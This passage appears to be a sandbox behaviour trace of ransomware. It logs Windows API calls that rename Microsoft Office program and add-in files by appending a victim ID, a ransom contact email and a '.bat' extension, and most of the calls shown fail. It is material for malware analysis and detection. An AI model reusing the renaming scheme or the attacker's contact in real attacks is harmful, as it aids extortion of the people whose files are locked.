dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.863] CloseHandle (hObject=0x434) returned 1 [0167.865] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.865] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDALLLNK.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wdalllnk.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.865] CloseHandle (hObject=0x434) returned 1 [0167.866] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.866] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WDERRLNK.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wderrlnk.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.866] CloseHandle (hObject=0x434) returned 1 [0167.867] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.867] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.867] CloseHandle (hObject=0x434) returned 1 [0167.868] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.869] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.869] CloseHandle (hObject=0x434) returned 1 [0167.870] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.870] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.871] CloseHandle (hObject=0x434) returned 1 [0167.871] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.871] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.872] CloseHandle (hObject=0x434) returned 1 [0167.872] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.872] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.873] CloseHandle (hObject=0x434) returned 1 [0167.874] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.874] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.875] CloseHandle (hObject=0x434) returned 1 [0167.875] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.875] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.876] CloseHandle (hObject=0x434) returned 1 [0167.918] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.918] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0167.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.918] CloseHandle (hObject=0x434) returned 1 [0169.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.Client.Excel.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.client.excel.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.Client.Excel.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.client.excel.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0169.573] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.Client.Windows.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.client.windows.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.Client.Windows.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.client.windows.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0169.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.Document.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.document.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.Document.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.document.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0169.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.ScriptDom.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.scriptdom.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.Mashup.ScriptDom.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashup.scriptdom.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0169.588] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.MashupEngine.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashupengine.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\Microsoft.MashupEngine.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\microsoft.mashupengine.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0171.457] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.457] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ar\\PowerViewRes.ar.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ar\\powerviewres.ar.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.457] CloseHandle (hObject=0x3e0) returned 1 [0171.463] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.463] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\PowerViewRes.bg.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\powerviewres.bg.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.463] CloseHandle (hObject=0x3e0) returned 1 [0171.468] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.468] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\PowerViewRes.ca.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\powerviewres.ca.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.469] CloseHandle (hObject=0x3e0) returned 1 [0171.473] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.473] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\cs\\PowerViewRes.cs.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\cs\\powerviewres.cs.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.473] CloseHandle (hObject=0x3e0) returned 1 [0171.477] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.477] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\da\\PowerViewRes.da.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\da\\powerviewres.da.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.478] CloseHandle (hObject=0x3e0) returned 1 [0171.482] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.482] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0171.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\de\\PowerViewRes.de.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\de\\powerviewres.de.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0171.483] CloseHandle (hObject=0x3e0) returned 1 [0173.865] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.866] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\PowerViewRes.tr.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\powerviewres.tr.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.866] CloseHandle (hObject=0x50c) returned 1 [0173.871] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.871] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\uk\\PowerViewRes.uk.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\uk\\powerviewres.uk.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.872] CloseHandle (hObject=0x50c) returned 1 [0173.877] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.877] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\vi\\PowerViewRes.vi.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\vi\\powerviewres.vi.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.877] CloseHandle (hObject=0x50c) returned 1 [0173.882] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.882] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHS\\PowerViewRes.zh-CHS.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-chs\\powerviewres.zh-chs.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.882] CloseHandle (hObject=0x50c) returned 1 [0173.891] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.892] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\zh-CHT\\PowerViewRes.zh-CHT.xap.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\zh-cht\\powerviewres.zh-cht.xap.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.892] CloseHandle (hObject=0x50c) returned 1 [0174.281] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ar\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ar\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0174.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\bg\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\bg\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0174.367] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ca\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ca\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.403] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.Office.Interop.Excel.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.office.interop.excel.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.Office.Interop.Excel.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.office.interop.excel.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.ReportingServices.QueryDesigners.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.reportingservices.querydesigners.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.ReportingServices.QueryDesigners.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.reportingservices.querydesigners.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.reportviewer.common.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.reportviewer.common.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.reportviewer.common.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.reportviewer.common.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.421] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ms\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ms\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0177.432] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\nl\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\nl\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel 